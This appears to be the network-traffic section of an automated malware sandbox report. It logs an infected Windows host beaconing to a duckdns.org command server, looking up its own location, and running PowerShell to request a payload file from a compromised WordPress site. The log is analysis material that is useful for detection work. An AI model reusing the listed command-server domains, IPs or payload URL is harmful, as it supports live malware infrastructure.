                                                                  Jul 26, 2024 15:47:23.915399075 CEST4434972334.166.62.190192.168.2.6
                                                                  Jul 26, 2024 15:47:23.915411949 CEST49723443192.168.2.634.166.62.190
                                                                  Jul 26, 2024 15:47:23.915455103 CEST49723443192.168.2.634.166.62.190
                                                                  Jul 26, 2024 15:47:23.916233063 CEST49723443192.168.2.634.166.62.190
                                                                  Jul 26, 2024 15:47:28.358011007 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:28.359585047 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:28.364577055 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:58.699078083 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:47:58.701972008 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:47:58.708058119 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:48:29.850104094 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:48:29.853786945 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:48:29.858803988 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:48:51.189382076 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:48:51.596507072 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:48:52.298501968 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:48:53.595258951 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:48:56.095371962 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:49:00.094688892 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:49:00.127953053 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:49:00.133959055 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:49:00.985907078 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:49:10.595280886 CEST4971380192.168.2.6178.237.33.50
                                                                  Jul 26, 2024 15:49:30.358177900 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:49:30.359302998 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:49:30.364223003 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:50:00.650283098 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:50:00.651177883 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:50:00.656375885 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:50:30.908466101 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:50:30.911253929 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:50:30.917530060 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:51:01.217928886 CEST5748449710192.253.251.227192.168.2.6
                                                                  Jul 26, 2024 15:51:01.219003916 CEST4971057484192.168.2.6192.253.251.227
                                                                  Jul 26, 2024 15:51:01.224581003 CEST5748449710192.253.251.227192.168.2.6
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jul 26, 2024 15:46:57.410226107 CEST5930453192.168.2.61.1.1.1
                                                                  Jul 26, 2024 15:46:57.525279045 CEST53593041.1.1.1192.168.2.6
                                                                  Jul 26, 2024 15:47:01.224493027 CEST6393753192.168.2.61.1.1.1
                                                                  Jul 26, 2024 15:47:01.232661009 CEST53639371.1.1.1192.168.2.6
                                                                  Jul 26, 2024 15:47:07.542587996 CEST6147753192.168.2.61.1.1.1
                                                                  Jul 26, 2024 15:47:07.567267895 CEST53614771.1.1.1192.168.2.6
                                                                  Jul 26, 2024 15:47:21.364842892 CEST6533953192.168.2.61.1.1.1
                                                                  Jul 26, 2024 15:47:21.665050983 CEST53653391.1.1.1192.168.2.6
                                                                  Jul 26, 2024 15:47:43.729777098 CEST5355230162.159.36.2192.168.2.6
                                                                  Jul 26, 2024 15:47:44.242279053 CEST53581981.1.1.1192.168.2.6
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jul 26, 2024 15:46:57.410226107 CEST192.168.2.61.1.1.10x4c5aStandard query (0)iwarsut775laudrye2.duckdns.orgA (IP address)IN (0x0001)false
                                                                  Jul 26, 2024 15:47:01.224493027 CEST192.168.2.61.1.1.10xbd6fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                  Jul 26, 2024 15:47:07.542587996 CEST192.168.2.61.1.1.10xf9a0Standard query (0)asociatiatraditiimaria.roA (IP address)IN (0x0001)false
                                                                  Jul 26, 2024 15:47:21.364842892 CEST192.168.2.61.1.1.10xba2Standard query (0)new.quranushaiqer.org.saA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jul 26, 2024 15:46:57.525279045 CEST1.1.1.1192.168.2.60x4c5aNo error (0)iwarsut775laudrye2.duckdns.org192.253.251.227A (IP address)IN (0x0001)false
                                                                  Jul 26, 2024 15:47:01.232661009 CEST1.1.1.1192.168.2.60xbd6fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                  Jul 26, 2024 15:47:04.057429075 CEST1.1.1.1192.168.2.60xcfa0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Jul 26, 2024 15:47:04.057429075 CEST1.1.1.1192.168.2.60xcfa0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Jul 26, 2024 15:47:07.567267895 CEST1.1.1.1192.168.2.60xf9a0No error (0)asociatiatraditiimaria.ro93.113.54.56A (IP address)IN (0x0001)false
                                                                  Jul 26, 2024 15:47:21.665050983 CEST1.1.1.1192.168.2.60xba2No error (0)new.quranushaiqer.org.sa34.166.62.190A (IP address)IN (0x0001)false
                                                                  • asociatiatraditiimaria.ro
                                                                  • new.quranushaiqer.org.sa
                                                                  • geoplugin.net
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.649713178.237.33.50804368C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jul 26, 2024 15:47:01.287750006 CEST71OUTGET /json.gp HTTP/1.1
                                                                  Host: geoplugin.net
                                                                  Cache-Control: no-cache
                                                                  Jul 26, 2024 15:47:01.925321102 CEST1170INHTTP/1.1 200 OK
                                                                  date: Fri, 26 Jul 2024 13:47:01 GMT
                                                                  server: Apache
                                                                  content-length: 962
                                                                  content-type: application/json; charset=utf-8
                                                                  cache-control: public, max-age=300
                                                                  access-control-allow-origin: *
                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.64971693.113.54.564432064C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-07-26 13:47:08 UTC189OUTGET /os/transportment.pfm HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: asociatiatraditiimaria.ro
                                                                  Connection: Keep-Alive
                                                                  2024-07-26 13:47:10 UTC518INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                  content-type: text/html; charset=UTF-8
                                                                  link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"
                                                                  transfer-encoding: chunked
                                                                  date: Fri, 26 Jul 2024 13:47:10 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-07-26 13:47:10 UTC850INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69
                                                                  Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; Asociaia Tradiii
                                                                  2024-07-26 13:47:10 UTC14994INData Raw: 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 73 6f 63 69 61 74 69 61 74 72 61 64 69 74 69 69 6d 61 72 69 61 2e 72 6f 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54
                                                                  Data Ascii: /core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/asociatiatraditiimaria.ro\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportT
                                                                  2024-07-26 13:47:10 UTC16384INData Raw: 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75
                                                                  Data Ascii: lock-button.is-style-outline .wp-block-button__link:hover,.wp-block-buttons .wp-block-button.is-style-outline .wp-block-button__link:focus,.wp-block-buttons .wp-block-button.is-style-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-bu
                                                                  2024-07-26 13:47:10 UTC16384INData Raw: 74 68 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 63 75 73 74 6f 6d 2d 2d 61 73 74 2d 77 69 64 65 2d 77 69 64 74 68 2d 73 69 7a 65 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 2e 61 6c 69 67 6e 66 75 6c 6c 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 7b 6d 61 72 67 69 6e 3a 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69
                                                                  Data Ascii: th: var(--wp--custom--ast-wide-width-size);}.entry-content[ast-blocks-layout] .alignfull {max-width: none;}.entry-content .wp-block-columns {margin-bottom: 0;}blockquote {margin: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-ri
                                                                  2024-07-26 13:47:10 UTC16384INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 69 74 65 2d 63 6f 6e 74 65 6e 74 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 63 68 69 76 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 2d 72 65 73 70 6f 6e 64 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                  Data Ascii: -container .site-content,.ast-separate-container .ast-archive-description,.ast-separate-container .comments-area .comment-respond,.ast-separate-container .comments-area .ast-comment-list li,.ast-separate-container .comments-area .comments-title{background
                                                                  2024-07-26 13:47:10 UTC16384INData Raw: 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69
                                                                  Data Ascii: ayout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-i


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.64971893.113.54.564432064C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-07-26 13:47:16 UTC71OUTGET /os/transportment.pfm HTTP/1.1
                                                                  Host: asociatiatraditiimaria.ro
                                                                  2024-07-26 13:47:17 UTC340INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                  content-type: text/html; charset=UTF-8
                                                                  link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"
                                                                  transfer-encoding: chunked
                                                                  date: Fri, 26 Jul 2024 13:47:16 GMT
                                                                  server: LiteSpeed
                                                                  2024-07-26 13:47:17 UTC1028INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69
                                                                  Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; Asociaia Tradiii
                                                                  2024-07-26 13:47:17 UTC14994INData Raw: 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b
                                                                  Data Ascii: auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);
                                                                  2024-07-26 13:47:17 UTC16384INData Raw: 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76
                                                                  Data Ascii: tyle-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-buttons .wp-block-button.wp-block-button__link.is-style-outline:not(.has-text-color):hover{color:var(--ast-global-color-5);background-color:var(--ast-global-color-0);border-color:v
                                                                  2024-07-26 13:47:17 UTC16384INData Raw: 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 29 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 29 20 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 3e 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c
                                                                  Data Ascii: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-right):not(.has-text-align-center) {border-left: 5px solid rgba(0,0,0,0.05);}.has-text-align-right > blockquote,blockquote.has-text-align-right {border-right: 5px solid rgba(0,0,0,
                                                                  2024-07-26 13:47:17 UTC16384INData Raw: 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 73 69 6e 67 6c 65 3a 6e 6f 74 28 2e 61 73 74 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 29 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f
                                                                  Data Ascii: ent-list li,.ast-separate-container .comments-area .comments-title{background-color:var(--ast-global-color-5);;background-image:none;;}@media (max-width:921px){.ast-separate-container .ast-article-single:not(.ast-related-post),.woocommerce.ast-separate-co
                                                                  2024-07-26 13:47:17 UTC16384INData Raw: 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e
                                                                  Data Ascii: s-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !importan


